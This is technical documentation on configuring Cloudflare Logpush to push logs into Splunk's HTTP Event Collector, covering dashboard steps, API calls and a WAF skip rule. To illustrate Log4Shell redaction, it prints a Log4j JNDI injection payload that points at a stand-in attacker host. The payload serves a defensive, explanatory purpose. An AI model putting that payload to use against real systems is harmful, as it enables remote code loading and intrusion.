
Enable Logpush to Splunk

Cloudflare Logpush supports pushing logs directly to Splunk via the Cloudflare dashboard or via API.

Manage via the Cloudflare dashboard

  1. Log in to the Cloudflare dashboard.

  2. Select the Enterprise account or domain (also known as zone) you want to use with Logpush. Depending on your choice, you have access to account-scoped datasets and zone-scoped datasets, respectively.

  3. Go to Analytics & Logs > Logpush.

  4. Select Create a Logpush job.

  5. In Select a destination, choose Splunk.

  6. Enter or select the destination information: the Splunk raw HTTP Event Collector endpoint URL, the channel ID, the authentication token, the source type, and whether to skip TLS certificate verification. These correspond to the destination_conf parameters described in the API section below.

When you are done entering the destination details, select Continue.

  7. Select the dataset to push to the storage service.

  8. In the next step, you need to configure your Logpush job:

    • Enter the Job name.
    • Under If logs match, you can select the events to include and/or remove from your logs. Refer to Filters for more information. Not all datasets have this option available.
    • In Send the following fields, you can choose to either push all logs to your storage destination or selectively choose which logs you want to push.
  9. In Advanced Options, you can:

    • Choose the format of timestamp fields in your logs (RFC3339 (default), Unix, or UnixNano).
    • Select a sampling rate for your logs or push a randomly-sampled percentage of logs.
    • Enable redaction for CVE-2021-44228. This option replaces every occurrence of ${ with x{ (see the example after these steps).
  10. Select Submit once you are done configuring your Logpush job.
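
For illustration, here is what the CVE-2021-44228 redaction does to a log field carrying a Log4j-style lookup. The payload below is a made-up example, not output from a real job:

Before: "ClientRequestUserAgent": "${jndi:ldap://attacker.example/a}"
After:  "ClientRequestUserAgent": "x{jndi:ldap://attacker.example/a}"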

Manage via API

To set up a Splunk Logpush job:

  1. Create a job with the appropriate endpoint URL and authentication parameters.
  2. Enable the job to begin pushing logs.
Ensure Log Share permissions are enabled before attempting to read or configure a Logpush job. For more information, refer to the Roles section.

1. Create a job

To create a job, make a POST request to the Logpush jobs endpoint with the following fields:

  • name (optional) - Use your domain name as the job name.

  • destination_conf - A log destination consisting of an endpoint URL, channel ID, insecure-skip-verify flag, source type, and authorization header, in the string format below (a sketch for assembling this string follows this list):

"splunk://<SPLUNK_ENDPOINT_URL>?channel=<SPLUNK_CHANNEL_ID>&insecure-skip-verify=<INSECURE_SKIP_VERIFY>&sourcetype=<SOURCE_TYPE>&header_Authorization=<SPLUNK_AUTH_TOKEN>"

    • <SPLUNK_ENDPOINT_URL>: The Splunk raw HTTP Event Collector URL with port. For example: splunk.cf-analytics.com:8088/services/collector/raw.
    • <SPLUNK_CHANNEL_ID>: A unique channel ID. This is a random GUID that you can generate with an online GUID generator or from the command line.
    • <INSECURE_SKIP_VERIFY>: Boolean value. Cloudflare recommends setting this value to false. Setting this value to true is equivalent to using the -k option with curl as shown in Splunk examples and is not recommended. Only set this value to true when HEC uses a self-signed certificate.
    • <SOURCE_TYPE>: The Splunk source type. For example: cloudflare:json.
    • <SPLUNK_AUTH_TOKEN>: The URL-encoded Splunk authorization token. For example: Splunk%20e6d94e8c-5792-4ad1-be3c-29bcaee0197d.
  • dataset - The category of logs you want to receive. Refer to Log fields for the full list of supported datasets.

  • output_options (optional) - To configure fields, sample rate, and timestamp format, refer to Log Output Options. For timestamp, Cloudflare recommends using timestamps=rfc3339.

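Below is a minimal sketch of one way to assemble the destination_conf string in a shell. It assumes uuidgen and jq are installed; the hostname reuses the example above, and <HEC_TOKEN> is a placeholder for your own token:

# Generate a random channel ID (GUID) for the Logpush job.
CHANNEL_ID=$(uuidgen)

# URL-encode the Splunk authorization header ("Splunk <token>").
AUTH=$(jq -rn --arg v "Splunk <HEC_TOKEN>" '$v|@uri')

# Assemble the destination_conf value.
echo "splunk://splunk.cf-analytics.com:8088/services/collector/raw?channel=${CHANNEL_ID}&insecure-skip-verify=false&sourcetype=cloudflare:json&header_Authorization=${AUTH}"
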
Example request using cURL:

curl -s -X POST \
https://api.cloudflare.com/client/v4/zones/<ZONE_ID>/logpush/jobs \
-H "X-Auth-Email: <EMAIL>" \
-H "X-Auth-Key: <API_KEY>" \
-d '{
  "name": "<DOMAIN_NAME>",
  "destination_conf": "splunk://<SPLUNK_ENDPOINT_URL>?channel=<SPLUNK_CHANNEL_ID>&insecure-skip-verify=<INSECURE_SKIP_VERIFY>&sourcetype=<SOURCE_TYPE>&header_Authorization=<SPLUNK_AUTH_TOKEN>",
  "output_options": {
    "field_names": ["ClientIP", "ClientRequestHost", "ClientRequestMethod", "ClientRequestURI", "EdgeEndTimestamp", "EdgeResponseBytes", "EdgeResponseStatus", "EdgeStartTimestamp", "RayID"],
    "timestamp_format": "rfc3339"
  },
  "dataset": "http_requests"
}' | jq .

Response:

{
  "errors": [],
  "messages": [],
  "result": {
    "id": 100,
    "dataset": "http_requests",
    "enabled": false,
    "name": "<DOMAIN_NAME>",
    "output_options": {
      "field_names": ["ClientIP", "ClientRequestHost", "ClientRequestMethod", "ClientRequestURI", "EdgeEndTimestamp", "EdgeResponseBytes", "EdgeResponseStatus", "EdgeStartTimestamp", "RayID"],
      "timestamp_format": "rfc3339"
    },
    "destination_conf": "splunk://<SPLUNK_ENDPOINT_URL>?channel=<SPLUNK_CHANNEL_ID>&insecure-skip-verify=<INSECURE_SKIP_VERIFY>&sourcetype=<SOURCE_TYPE>&header_Authorization=<SPLUNK_AUTH_TOKEN>",
    "last_complete": null,
    "last_error": null,
    "error_message": null
  },
  "success": true
}
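
Before enabling the job, you can sanity-check the HEC endpoint, channel, and token with a direct request to Splunk's raw collector endpoint. This is a hedged example using standard Splunk HEC semantics; substitute your own hostname, channel GUID, and token. HEC typically answers a successful request with {"text":"Success","code":0}:

curl "https://splunk.cf-analytics.com:8088/services/collector/raw?channel=<SPLUNK_CHANNEL_ID>" \
-H "Authorization: Splunk <HEC_TOKEN>" \
-d '{"event": "logpush connectivity test"}'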

2. Enable (update) a job

To enable a job, make a PUT request to the Logpush jobs endpoint. Use the job ID returned from the previous step in the URL and send {"enabled":true} in the request body.

Example request using cURL:

curl -s -X PUT \
https://api.cloudflare.com/client/v4/zones/<ZONE_ID>/logpush/jobs/100 \
-H "X-Auth-Email: <EMAIL>" \
-H "X-Auth-Key: <API_KEY>" \
-d '{"enabled": true}' | jq .

Response:

{
  "errors": [],
  "messages": [],
  "result": {
    "id": 100,
    "dataset": "http_requests",
    "enabled": true,
    "name": "<DOMAIN_NAME>",
    "output_options": {
      "field_names": ["ClientIP", "ClientRequestHost", "ClientRequestMethod", "ClientRequestURI", "EdgeEndTimestamp", "EdgeResponseBytes", "EdgeResponseStatus", "EdgeStartTimestamp", "RayID"],
      "timestamp_format": "rfc3339"
    },
    "destination_conf": "splunk://<SPLUNK_ENDPOINT_URL>?channel=<SPLUNK_CHANNEL_ID>&insecure-skip-verify=<INSECURE_SKIP_VERIFY>&sourcetype=<SOURCE_TYPE>&header_Authorization=<SPLUNK_AUTH_TOKEN>",
    "last_complete": null,
    "last_error": null,
    "error_message": null
  },
  "success": true
}
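
To confirm the job is healthy, read it back with a GET request to the same endpoint. After the first successful push, last_complete carries a timestamp and last_error remains null:

curl -s -X GET \
https://api.cloudflare.com/client/v4/zones/<ZONE_ID>/logpush/jobs/100 \
-H "X-Auth-Email: <EMAIL>" \
-H "X-Auth-Key: <API_KEY>" | jq .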

Refer to the Logpush FAQ for troubleshooting information.

3. Create WAF custom rule for Splunk HEC endpoint (optional)

If your Logpush destination hostname is proxied through Cloudflare, and you have the Cloudflare Web Application Firewall (WAF) turned on, Cloudflare's requests to the Splunk HTTP Event Collector (HEC) may be challenged or blocked. To prevent this, create a WAF custom rule that skips the WAF for requests to the HEC endpoint.

  1. Log in to the Cloudflare dashboard and select your account. Go to Security > WAF > Custom rules.
  2. Select Create rule and enter a descriptive name for it (for example, Splunk).
  3. Under If incoming requests match, use the Field, Operator, and Value dropdowns to create a rule. After finishing each row, select And to create the next row of rules. Refer to the table below for the values you should input:
Field              Operator   Value
Request Method     equals     POST
Hostname           equals     Your Splunk endpoint hostname. For example: splunk.cf-analytics.com
URI Path           equals     /services/collector/raw
URI Query String   contains   channel
AS Num             equals     132892
User Agent         equals     Go-http-client/2.0
  4. After inputting the values as shown in the table, you should have an Expression Preview with the values you added for your specific rule. The example below reflects the hostname splunk.cf-analytics.com.

(http.request.method eq "POST" and http.host eq "splunk.cf-analytics.com" and http.request.uri.path eq "/services/collector/raw" and http.request.uri.query contains "channel" and ip.geoip.asnum eq 132892 and http.user_agent eq "Go-http-client/2.0")

  5. Under the Then > Choose an action dropdown, select Skip.
  6. Under WAF components to skip, select All managed rules.
  7. Select Deploy.
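
If you manage WAF configuration through the API instead, the sketch below adds an equivalent skip rule via the Rulesets API. It assumes you have already looked up <RULESET_ID>, the ID of your zone's http_request_firewall_custom phase entrypoint ruleset, and that skipping all managed rules maps to the action_parameters shown; verify both against the current Rulesets API reference before relying on it:

curl -s -X POST \
https://api.cloudflare.com/client/v4/zones/<ZONE_ID>/rulesets/<RULESET_ID>/rules \
-H "X-Auth-Email: <EMAIL>" \
-H "X-Auth-Key: <API_KEY>" \
-d '{
  "description": "Skip managed rules for Splunk HEC",
  "expression": "(http.request.method eq \"POST\" and http.host eq \"splunk.cf-analytics.com\" and http.request.uri.path eq \"/services/collector/raw\" and http.request.uri.query contains \"channel\" and ip.geoip.asnum eq 132892 and http.user_agent eq \"Go-http-client/2.0\")",
  "action": "skip",
  "action_parameters": { "phases": ["http_request_firewall_managed"] }
}' | jq .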

The WAF should now ignore requests made to Splunk HEC by Cloudflare.
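
Once the job is enabled and the WAF rule is in place, you can verify events are arriving on the Splunk side. One way, assuming access to Splunk's management port (8089 by default) and the cloudflare:json source type used above, is the search REST API:

curl -k -u <SPLUNK_USER>:<SPLUNK_PASSWORD> \
https://splunk.cf-analytics.com:8089/services/search/jobs/export \
-d search='search sourcetype="cloudflare:json" | head 5' \
-d output_mode=json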


More resources

Video tutorial: Send Network Analytics logs to Splunk

The following video shows how to integrate Network Analytics logs in Splunk.